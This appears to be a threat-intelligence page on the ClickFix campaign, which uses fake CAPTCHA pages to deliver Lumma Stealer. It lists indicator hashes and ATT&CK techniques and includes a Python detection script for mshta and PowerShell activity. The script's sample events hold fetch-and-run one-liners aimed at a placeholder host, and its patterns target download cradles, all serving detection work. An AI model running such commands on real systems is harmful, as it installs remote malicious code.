Behind the CAPTCHA: A Clever Gateway of Malware
Sept. 24, 2024, 2:38 p.m.
Description
A sophisticated infection chain dubbed ClickFix has been observed using fake CAPTCHA pages to distribute Lumma Stealer malware. The campaign targets multiple countries through two main delivery vectors: download URLs for cracked games and phishing emails impersonating GitHub. The fake CAPTCHA page copies a malicious script to the visitor's clipboard, and the victim is tricked into pasting and executing it, so the first stage is launched by the user rather than by an exploit; the chain then installs the malware. The attack employs multi-layered encryption of its payloads and leverages mshta to bypass detection. Mitigation strategies include user education, robust email filtering, and keeping systems updated. The global reach and deceptive tactics highlight the evolving nature of such threats.
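A detection sketch for the chain described above, added here as an example and not taken from the report: it scores process-creation events (Sysmon Event ID 1 style fields, constructed inline) for the mshta and PowerShell behaviour the description names. The command lines, the explorer.exe-parent heuristic for a command pasted into the Run dialog, and the alert threshold are assumptions, not indicators from this page.

```python
"""Score process-creation events for ClickFix-style mshta / PowerShell activity.

Added illustration, not the report's own detection content. Field names follow
Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample events are
constructed and the command lines are assumed, not quoted from the campaign.
"""
import json
import re

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# Command-line traits typical of a one-liner a victim pastes into the Run dialog.
PS_TRAITS = [
    (re.compile(r"(?i)(^|\s)-(w|win|window(style)?)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), "invoke-expression"),
    (re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b)"), "download cradle"),
]

# Assumption: a command pasted into Win+R is spawned by explorer.exe, so that parent
# raises the score; a scripted or service-launched PowerShell would not.
INTERACTIVE_PARENTS = {"explorer.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []
    if image == "mshta.exe":
        score += 2
        reasons.append("mshta.exe execution")
        if URL_RE.search(cmd):
            score += 3
            reasons.append("mshta fetching a remote URL")
    elif image in ("powershell.exe", "pwsh.exe"):
        for pattern, label in PS_TRAITS:
            if pattern.search(cmd):
                score += 2
                reasons.append(f"powershell {label}")
    if reasons and parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"spawned by {parent} (consistent with a pasted Run command)")
    return score, reasons


def detect(jsonl: str, threshold: int = 4) -> list[dict]:
    """Parse JSON-lines events and return those scoring at or above the threshold."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"Image": basename(ev["Image"]), "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry): two ClickFix-like launches,
# one routine scheduled script, one local .hta run by an installer.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "mshta https://example.invalid/verify.mp4"}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/a.ps1)"'}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\System32\cmd.exe",
                "CommandLine": r"powershell -File C:\scripts\backup.ps1"}),
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\System32\msiexec.exe",
                "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"}),
])

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The threshold keeps a lone mshta run of a local .hta (score 2) below alert level while either a remote URL or an interactive parent pushes a real ClickFix launch well above it; tune the weights against your own baseline before deploying anything like this.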
Date
Published: Sept. 24, 2024, 2:07 p.m.
Created: Sept. 24, 2024, 2:07 p.m.
Modified: Sept. 24, 2024, 2:38 p.m.
Indicators (SHA-256 file hashes)
bbf7154f14d736f0c8491fb9fb44d2f179cdb02d34ab54c04466fa0702ea7d55
fa58022d69ca123cbc1bef13467d6853b2d55b12563afdbb81fc64b0d8a1d511
632816db4e3642c8f0950250180dfffe3d37dca7219492f9557faf0ed78ced7c
19d04a09e2b691f4fb3c2111d308dcfa2651328dfddef701d86c726dce4a334a
d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207
cc29f33c1450e19b9632ec768ad4c8c6adbf35adaa3e1de5e19b2213d5cc9a54
b6a016ef240d94f86e20339c0093a8fa377767094276730acd96d878e0e1d624
Attack Patterns
Lumma Stealer
AsyncRAT
T1048 Exfiltration Over Alternative Protocol
T1074 Data Staged
T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass
T1059.001 Command and Scripting Interpreter: PowerShell
T1567 Exfiltration Over Web Service
T1012 Query Registry
T1005 Data from Local System
T1082 System Information Discovery
T1083 File and Directory Discovery
T1204 User Execution
T1140 Deobfuscate/Decode Files or Information
T1132 Data Encoding
T1027 Obfuscated Files or Information
T1566 Phishing